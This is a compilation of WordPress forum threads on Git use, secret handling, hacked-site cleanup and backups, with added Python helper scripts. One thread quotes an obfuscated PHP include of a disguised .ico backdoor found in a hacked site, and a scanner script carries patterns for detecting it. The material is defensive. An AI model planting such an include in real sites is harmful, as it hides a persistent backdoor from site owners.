Using wordpress with GitHub - wordpress

Is it okay to put my WordPress config file (containing database name, username, password, etc.) on my GitHub repo if I'm using WordPress with my website? Or is it not secure? Why or why not?
If it's not secure, what steps can I take to not put it on GitHub, since it's public, but at the same time be able to use GitHub as version control for my website and push files to the server?

No, I would not upload your config file to your repository. Unless it's private, but even then... use caution. As a best practice I only add the theme folder that I am working on into the repository; there really is no need to add WordPress in its entirety to the repo.
To ignore that file when pushing to your repo, add it to your .gitignore (https://help.github.com/articles/ignoring-files/) and it won't be added.

In addition to using .gitignore to keep your wp-config.php file out of your repo, you can also move it one directory above where you have WordPress installed and WordPress will look for it there.

Related

Wordpress site hacked?

It looks like my WordPress site has been hacked. The following code snippet was in index.php and wp-config.php:
<?php
/*6b9bb*/
#include "\057ho\155e/\151nt\145r7\0602/\160ub\154ic\137ht\155l/\167p-\151nc\154ud\145s/\152s/\164in\171mc\145/.\146b4\063d6\0700.\151co";
/*6b9bb*/
I have changed:
WP admin URL, and set a strong username and password
cPanel/FTP password, to a strong one
Implemented iThemes Security
Updated WordPress to the latest version (themes and plugins)
However, the code reappeared. What can be good solutions?
P.S. I am using SiteGround.
Thanks
Yeah, someone is including a .ico file (open it with a text editor and you will see it is some PHP code and not a real .ico file):
/home/inter702/public_html/wp-includes/js/tinymce/.fb43d680.ico
Somehow, despite your changes of host and passwords, your hacker is able to get in. Once they are in they can set up all sorts of backdoors to keep access; any .php file of theirs can do this.
At the moment, closing the initial front door they use is your sole occupation.
Follow the advice in this article:
https://codex.wordpress.org/FAQ_My_site_was_hacked
And then: https://codex.wordpress.org/Hardening_WordPress
Here are some links about backdoors:
http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
http://smackdown.blogsblogsblogs.com/2012/11/14/hacked-on-hostpapa-or-netregistry/
http://ottopress.com/2009/hacked-wordpress-backdoors/
Source: https://wordpress.org/support/topic/wordpress-hacked-strange-files-appears/
Once the site is hacked, in my opinion, resistance is futile. No scan or tool will help you. You'll have to replace all files with fresh downloads. Mostly it's straightforward:
Backup the whole installation (just in case)
Download the complete wp-content/uploads folder
Make a Screenshot or save the page with the currently active plugins
Delete ALL files
Get a fresh wordpress setup and extract it
Download a fresh copy of your theme and child-theme (recreate the previous setup)
Copy the previous wp-config.php to this fresh install, but take a GOOD look at it. Usually it also has some virus/backdoors in it, usually easy to see and remove. Now you're already connected with your DB.
Examine the saved uploads folder for files that shouldn't be there, like PHP files. Then upload it to the new folder.
Reinstall all plugins, fresh downloads
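Two of the steps above are mechanical enough to script: recovering the real include target hidden behind the `\057ho\155e...` escapes (the answer about the fake .ico file), and the "examine the saved uploads folder for files that shouldn't be there" pass of the clean-reinstall procedure. The Python below is an added example, not code from either answer. Note that in PHP `#` begins a line comment, so the line as quoted only executes if the original read `@include`; the quoted string decodes identically either way. The directory layout it scans is constructed inline as a harmless stand-in for the hacked tree, and the file names are assumptions for the demo.

```python
"""Decode the escaped include path from the quoted injection, then walk a
WordPress tree for the artefacts a clean-up should inspect: non-PHP files that
contain PHP (the fake .ico), PHP files carrying the /*xxxxx*/ marker comment,
and any .php file under wp-content/uploads."""
import os
import re
import tempfile

# Escapes PHP honours inside double-quoted strings; this malware only uses \ooo.
_SIMPLE = {"n": "\n", "r": "\r", "t": "\t", "v": "\v", "e": "\x1b", "f": "\f",
           "\\": "\\", "$": "$", '"': '"'}
_ESCAPE_RE = re.compile(r'\\(?:([0-7]{1,3})|x([0-9A-Fa-f]{1,2})|([nrtvef\\$"]))')


def decode_php_string(s):
    """Decode \\ooo octal, \\xhh hex and simple escapes; unknown escapes stay as-is, as in PHP."""
    def repl(m):
        octal, hexa, simple = m.groups()
        if octal is not None:
            return chr(int(octal, 8) & 0xFF)   # PHP wraps values above \377 to a byte
        if hexa is not None:
            return chr(int(hexa, 16))
        return _SIMPLE[simple]
    return _ESCAPE_RE.sub(repl, s)


INCLUDE_RE = re.compile(r'(?:include|require)(?:_once)?\s*\(?\s*"((?:[^"\\]|\\.)*)"')
MARKER_RE = re.compile(r"/\*[0-9a-f]{5}\*/")   # the /*6b9bb*/ comments bracketing the line
PHP_TAG = b"<?php"

# The snippet from the question, verbatim (raw string keeps the backslashes).
SNIPPET = r'''<?php
/*6b9bb*/
#include "\057ho\155e/\151nt\145r7\0602/\160ub\154ic\137ht\155l/\167p-\151nc\154ud\145s/\152s/\164in\171mc\145/.\146b4\063d6\0700.\151co";
/*6b9bb*/
'''


def included_paths(php_source):
    """Decoded target of every double-quoted include/require in a PHP source text."""
    return [decode_php_string(m.group(1)) for m in INCLUDE_RE.finditer(php_source)]


def suspicious_files(root):
    """Walk `root` and return (relative path, reason) for files a clean-up should inspect."""
    findings = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            ext = os.path.splitext(name)[1].lower()
            with open(full, "rb") as fh:
                head = fh.read(4096)          # enough to catch a leading <?php or the marker
            if ext != ".php" and PHP_TAG in head:
                findings.append((rel, "PHP code in a non-PHP file"))
            if ext == ".php" and MARKER_RE.search(head.decode("latin-1")):
                findings.append((rel, "injection marker comment"))
            if ext == ".php" and rel.startswith("wp-content/uploads/"):
                findings.append((rel, "PHP file under uploads"))
    return findings


def build_sample_tree(base):
    """Write a constructed, harmless stand-in for the hacked tree under `base` (assumed names)."""
    files = {
        "index.php": SNIPPET.encode(),
        "wp-includes/js/tinymce/.fb43d680.ico": b"<?php /* constructed stand-in for the dropped payload */\n",
        "wp-content/uploads/2019/photo.jpg": b"\xff\xd8\xff\xe0 not php",
        "wp-content/uploads/2019/shell.php": b"<?php // constructed: a PHP file has no business here\n",
        "wp-content/themes/my-theme/functions.php": b"<?php // clean theme file\n",
    }
    for rel, data in files.items():
        path = os.path.join(base, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(data)


def demo():
    """Build the sample tree in a temporary directory, scan it and return sorted findings."""
    with tempfile.TemporaryDirectory() as base:
        build_sample_tree(base)
        return sorted(suspicious_files(base))


if __name__ == "__main__":
    for target in included_paths(SNIPPET):
        print("include target:", target)
    for rel, why in demo():
        print(f"{why}: {rel}")
```

Run it against the real document root instead of the temporary tree by calling `suspicious_files("/path/to/public_html")`; the decoded include target tells you which file to pull out and read first, and the uploads hit is why the answer says to check that folder before copying it back.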
I faced this problem too, and I did the steps below, step by step:
Cleaning the injected code, manually
Changing all the passwords
Hiding the WP admin dashboard URL
Limiting the login attempts
Installing security plugins (Sucuri, Wordfence security)
Contracting with Sucuri plan
The good thing is to install the Wordfence Security plugin and run the scan; then you will detect all the files with the injected code and you can clean the injected code manually.
You can also visit this link:
https://naderzad.info/web-development/wordpress-code-injection/

Using Wordpress with Git - which files should I ignore?

For the past 6 or so months I have been working on Laravel projects that are closer to web apps rather than full, content managed sites.
Recently I've started a WordPress project and there's something that baffles me: how do you use Git with WordPress?
I ask because in Laravel you can basically push everything aside from node_modules, storage and the composer vendor folder.
I have also read that it is not a good idea to store wp-config in your repository; it's a strange one, as Laravel uses an .env file to similar effect.
I found the following .gitignore:
*.log
wp-config.php
wp-content/advanced-cache.php
wp-content/backup-db/
wp-content/backups/
wp-content/blogs.dir/
wp-content/cache/
wp-content/upgrade/
wp-content/uploads/
wp-content/mu-plugins/
wp-content/wp-cache-config.php
wp-content/plugins/hello.php
/.htaccess
/license.txt
/readme.html
/sitemap.xml
/sitemap.xml.gz
You can ignore almost everything with the following exceptions:
wp-content/themes/my-theme (your theme and/or child theme)
wp-content/plugins/my-custom-plugin (any custom plugins you create)
Additionally, I have found two very good sources for gitignore files for WordPress. The first which is very straightforward is on gitignore.org and the second which is extremely surgical is by Sal Ferrarello and can be found here: https://salferrarello.com/wordpress-gitignore/
Just modify as required and of course, avoid the config.php. It has install specific info such as your database host & login which you may not want to expose to prying eyes.
Laravel's .env file contains sensitive data just as WP's wp-config.php so we don't usually push it into the repo.
As to how I use Git with WordPress:
I exclude the wp-config.php file, the developer cloning the repo doesn't need it anyways: they can fill in the credentials themselves when working on the project on their local development environment. Another good reason to leave this file out is you don't want to expose your site's details (host, database name, username, password, salts, etc) to the world.
I exclude the uploads folder. The reason is that while developing we usually add dummy images to our posts and pages, images that won't be used at all when the site is finally ready for production so there's no reason to "pollute" the repo with these.
One of the things I love about Laravel is that database changes can also be tracked thanks to migrations. WordPress, on the other hand, doesn't have anything like that, so you'll have to find a plugin (or some other means) to keep your local database in sync with the staging one.
Update:
Since you updated your question to ask which files should be specifically excluded from the Git repo, I think the ones you posted from that .gitignore file you found are good enough. I don't see the need to ignore the readme.txt file though but that won't do any harm either.
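The advice in the first question (keep wp-config.php out of the repo) and in this one (ignore almost everything, track only your theme and custom plugins) amounts to a policy that can be checked before every commit. The Python below is an added example, not code from any of the answers: it applies the .gitignore patterns quoted in the question with a deliberately small matcher (leading `/` anchors to the repo root, trailing `/` means a directory, a pattern without `/` matches the file name at any depth, `*` wildcards), enforces the theme/plugin allowlist, and additionally refuses any file that `define()`s a WordPress secret, since the credentials leak just as badly from a copy pasted into a theme file. The tracked directory names `my-theme` and `my-custom-plugin` come from the answer; the staged files are constructed for the demo and contain no real credentials.

```python
"""Pre-commit style check for a WordPress repository: block files the .gitignore
says to ignore, block files outside the theme/plugin allowlist, and block any
file that defines a wp-config.php secret, whatever it is named."""
import fnmatch
import re

# The .gitignore quoted in the question.
IGNORE_PATTERNS = [
    "*.log", "wp-config.php", "wp-content/advanced-cache.php",
    "wp-content/backup-db/", "wp-content/backups/", "wp-content/blogs.dir/",
    "wp-content/cache/", "wp-content/upgrade/", "wp-content/uploads/",
    "wp-content/mu-plugins/", "wp-content/wp-cache-config.php",
    "wp-content/plugins/hello.php", "/.htaccess", "/license.txt",
    "/readme.html", "/sitemap.xml", "/sitemap.xml.gz",
]

# Directories the developer owns (names from the answer; adjust per project).
TRACKED_PREFIXES = ("wp-content/themes/my-theme/", "wp-content/plugins/my-custom-plugin/")

# wp-config.php constants whose values are secrets.
SECRET_CONSTANTS = ("DB_PASSWORD", "AUTH_KEY", "SECURE_AUTH_KEY", "LOGGED_IN_KEY", "NONCE_KEY",
                    "AUTH_SALT", "SECURE_AUTH_SALT", "LOGGED_IN_SALT", "NONCE_SALT")
SECRET_RE = re.compile(r"""define\s*\(\s*['"](""" + "|".join(SECRET_CONSTANTS) + r""")['"]\s*,""")


def is_ignored(path, patterns=IGNORE_PATTERNS):
    """True if a repo-relative path matches one of the patterns (subset of gitignore syntax)."""
    path = path.lstrip("/")
    for pat in patterns:
        anchored = pat.startswith("/")
        directory = pat.endswith("/")
        core = pat.strip("/")
        if directory:
            # A directory pattern ignores everything beneath it.
            if path == core or path.startswith(core + "/"):
                return True
        elif "/" in core or anchored:
            # A pattern with a slash (or anchored) matches the whole relative path.
            if fnmatch.fnmatchcase(path, core):
                return True
        elif fnmatch.fnmatchcase(path.rsplit("/", 1)[-1], core):
            # No slash: matches the file name at any depth.
            return True
    return False


def should_track(path):
    """Allowlist from the answer: only your theme and custom plugins, minus anything ignored."""
    return path.startswith(TRACKED_PREFIXES) and not is_ignored(path)


def find_secrets(text):
    """Names of the secret constants define()d in a file's contents."""
    return [m.group(1) for m in SECRET_RE.finditer(text)]


def check_staged(files):
    """files: {repo-relative path: contents}. Returns (path, reason) pairs that must not be committed."""
    problems = []
    for path, text in files.items():
        if is_ignored(path):
            problems.append((path, "matches .gitignore"))
        elif not should_track(path):
            problems.append((path, "outside tracked theme/plugin directories"))
        secrets = find_secrets(text)
        if secrets:
            problems.append((path, "defines " + ", ".join(secrets)))
    return problems


# Constructed staging area: a wp-config.php, a log, an upload, and a credential
# block someone copied into a theme file. Values are placeholders, not real secrets.
SAMPLE = {
    "wp-config.php": "<?php\ndefine('DB_NAME', 'wp');\ndefine('DB_PASSWORD', 'placeholder');\n",
    "wp-content/themes/my-theme/style.css": "/* Theme Name: my-theme */\n",
    "wp-content/themes/my-theme/debug.log": "notice: ...\n",
    "wp-content/themes/my-theme/inc/settings.php": "<?php\ndefine(\"AUTH_KEY\", 'copied-from-prod');\n",
    "wp-content/uploads/2019/photo.jpg": "\xff\xd8 (image bytes)",
    "wp-content/plugins/my-custom-plugin/plugin.php": "<?php // plugin entry point\n",
}

if __name__ == "__main__":
    for path, reason in check_staged(SAMPLE):
        print(f"BLOCK {path}: {reason}")
```

Wired into a pre-commit hook with the output of `git diff --cached --name-only`, the secret scan is the part that `.gitignore` alone never gives you: ignoring wp-config.php does nothing once its contents have been pasted somewhere else.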

Where to download Git in your local Wordpress directory?

Where would I download Git in my local WordPress environment so that I can create a branch, use it as a type of test environment, and have access to the other themes?
If you are looking to test plugins and themes, it's most likely that your working directory should be established in /wp-content - it contains both /plugins and /themes. You'll want to make sure you have a .gitignore file that only tracks what you're working on.
If you are looking to work on changes to core, your working directory will almost always be the top-most WordPress root. That way, you can track WordPress/WordPress.
Actually, I put my GitHub folder in my themes folder, and then I could use the repos in my GitHub folder on my localhost WordPress site.

how to setup subversion using svn?

I have a hosting account where I put my domains' files. I have one directory called wordpress where I installed a copy of WP. What I am trying to do is an SVN checkout on that folder.
But I get: Redirect cycle detected for URL '....
Any ideas how to set it up so that I can grab those files on my computer and then check them in after I make changes?
Also, I'm not necessarily looking for something specific to WordPress; I might want to check out some other files later on.
Thanks
You need to make sure that the folder you are trying to check out is an actual SVN repository.
You can do so with the svnadmin create command. More info available here

How to back up wordpress site to be restored after a clean installation

My WordPress blog appears to have been hacked, and now blog posts do not save and any changes I make, such as approving a comment, do not take effect. I am trying to back up my website so as to uninstall WordPress and perform a clean reinstallation. I want to create a backup so that when I restore, the website will appear with everything the same as before: posts, images, links, colors, comments, themes, pages, etc. I have already backed up the MySQL database successfully. How do I back up the rest of the site?
Please tell me how to back up the site and also how to restore the site.
Thanks
You need to back up both your database and your WordPress installation. The main resource to use for this is the WordPress site:
http://codex.wordpress.org/WordPress_Backups
If you have phpMyAdmin installed you can do a database dump from there. If you don't have this installed then use mysqldump.
Wordpress installation backup can be initiated through the following URL:
http://[yourwordpressurl]/wp-admin/export.php
That will contain "your posts, pages, comments, custom fields, categories, and tags".
These links should get you started:
http://www.geeksaresexy.net/2008/01/29/how-to-backup-and-restore-your-wordpress-blog/
http://www.siteground.com/tutorials/wordpress/wordpress_backup.htm
http://codex.wordpress.org/WordPress_Backups
Good idea to look at FAQ: My site was hacked (WordPress Codex) and How to Completely Clean a Hacked WordPress Install.
The best thing to do is to manually copy the database, as the WordPress restore has an upload limit on the built-in restore function. So if you've been blogging for a while, this can be really bad.
mysqldump -u yourUsername -p yourDatabaseName > databaseName.sql
will create the file databaseName.sql; this is a full clone of all your database info (all your posts & WordPress configs).
then you can restore later with
mysql -u yourUsername -p yourDatabaseName < databaseName.sql
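The two commands above are right for an interactive session, where `-p` with no value makes the client prompt for the password. The moment the dump is scripted (cron, a deploy hook), people tend to write `-pPASSWORD` on the command line, which every user on the host can read with `ps`. The Python below is an added example, not from the answer: it reads `DB_NAME`, `DB_USER`, `DB_PASSWORD` and `DB_HOST` out of wp-config.php (including the `host:port` and `host:/socket` forms WordPress accepts), writes them to a mode-0600 MySQL option file, and builds the `mysqldump` and `mysql` argument lists with `--defaults-extra-file` so the password never appears in argv. The sample wp-config.php is constructed with placeholder values; the option file name `wp-backup.cnf` is an assumption.

```python
"""Build mysqldump/mysql invocations for a WordPress database without exposing
the password on the command line."""
import os
import re
import stat
import tempfile

_DEFINE_RE = re.compile(
    r"""define\s*\(\s*['"](DB_NAME|DB_USER|DB_PASSWORD|DB_HOST)['"]\s*,\s*['"]([^'"]*)['"]\s*\)""")


def parse_wp_config(text):
    """Return the four DB_* constants from wp-config.php source; fail loudly if one is absent."""
    found = dict(_DEFINE_RE.findall(text))
    missing = [k for k in ("DB_NAME", "DB_USER", "DB_PASSWORD", "DB_HOST") if k not in found]
    if missing:
        raise ValueError("wp-config.php is missing " + ", ".join(missing))
    return found


def split_host(db_host):
    """WordPress accepts 'host', 'host:port' and 'host:/path/to/socket' in DB_HOST."""
    host, sep, rest = db_host.partition(":")
    if not sep:
        return host, None, None
    if rest.startswith("/"):
        return host, None, rest
    return host, int(rest), None


def _quote(value):
    """Quote an option-file value so '#' and quotes inside a password survive parsing."""
    return '"' + value.replace("\\", "\\\\").replace('"', '\\"') + '"'


def write_defaults_file(cfg, directory):
    """Write a [client] option file readable only by the owner and return its path."""
    path = os.path.join(directory, "wp-backup.cnf")   # assumed file name
    host, port, socket = split_host(cfg["DB_HOST"])
    lines = ["[client]", f"user={cfg['DB_USER']}", f"password={_quote(cfg['DB_PASSWORD'])}", f"host={host}"]
    if port:
        lines.append(f"port={port}")
    if socket:
        lines.append(f"socket={socket}")
    # O_EXCL refuses to clobber an existing file; 0o600 keeps other users out.
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o600)
    with os.fdopen(fd, "w") as fh:
        fh.write("\n".join(lines) + "\n")
    return path


def dump_command(cfg, defaults_file, out_file):
    """argv for mysqldump; --defaults-extra-file must be the first option."""
    return ["mysqldump", f"--defaults-extra-file={defaults_file}", "--single-transaction",
            "--routines", "--triggers", f"--result-file={out_file}", cfg["DB_NAME"]]


def restore_command(cfg, defaults_file):
    """argv for mysql; feed the .sql dump on stdin, e.g. subprocess.run(argv, stdin=open(dump, 'rb'))."""
    return ["mysql", f"--defaults-extra-file={defaults_file}", cfg["DB_NAME"]]


def plan_backup(wp_config_text, directory, out_file="databaseName.sql"):
    """Parse the config, write the option file, return (dump argv, restore argv, option file path)."""
    cfg = parse_wp_config(wp_config_text)
    cnf = write_defaults_file(cfg, directory)
    return dump_command(cfg, cnf, out_file), restore_command(cfg, cnf), cnf


# Constructed wp-config.php fragment with placeholder values.
SAMPLE_WP_CONFIG = """<?php
define( 'DB_NAME', 'wp_blog' );
define( 'DB_USER', 'wp_user' );
define( 'DB_PASSWORD', 'c0rrect#horse' );
define( 'DB_HOST', 'localhost:3307' );
"""


def demo():
    """Plan a backup in a throwaway directory; return the argv lists, file mode and option file text."""
    with tempfile.TemporaryDirectory() as d:
        dump, restore, cnf = plan_backup(SAMPLE_WP_CONFIG, d)
        mode = stat.S_IMODE(os.stat(cnf).st_mode)
        with open(cnf) as fh:
            contents = fh.read()
    return dump, restore, mode, contents


if __name__ == "__main__":
    dump, restore, mode, contents = demo()
    print(" ".join(dump))
    print(" ".join(restore))
    print(f"option file mode {mode:o}")
```

Run the argv lists with `subprocess.run(dump, check=True)` from a script that lives outside the web root, delete the option file when the job finishes, and keep the resulting .sql out of the repository for the same reason wp-config.php stays out: a dump contains every user's password hash and every option value.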
I figured it out. One way to cleanly install a new version of WordPress but not lose your website is to use the WordPress export feature as mentioned by Jon.
http://codex.wordpress.org/Tools_Export_SubPanel
This exports your blog to an XML file that contains all the content of your site: posts, comments, authors, pages, etc. However, images do not go with it. When importing this XML file, though, there is an option to download and import the attachments automatically, which can be done if the original site is still online. So what I did is export my XML file, upload it to a WordPress blog installed on a subdomain, automatically getting the attachments, then export an XML file from the subdomain to import into the actual WordPress site. This way my attachments were simply moved around from site to subdomain and back to site. This made it easy because I did not have to handle backing up my attachments manually.
So what I did was back up my theme, export my blog to XML, then delete wordpress and my database then reinstall it with a new database on both my site and a subdomain of my site.
Then I imported my XML file and put my theme in the themes folder of the subdomain. Then I exported an XML file of this subdomain copy of my site and imported it into my real site. This made my blog have all the content correct and the theme right but none of the links, plugins, or colors correct. I then had to customize wordpress through the panel to get it back to the look and feel it was. For this It was lucky I had a stored copy of the site to refer to.
This process was long because I actually had to rebuild my site twice, one for the subdomain and then again for the actual thing. But it fixed my problems.
You can simply use EverLive.net. No need to install any plugin. No need for shell access. With this service you can simply back up your WordPress website to the cloud. A one-click restore option is also available whenever you need to restore.
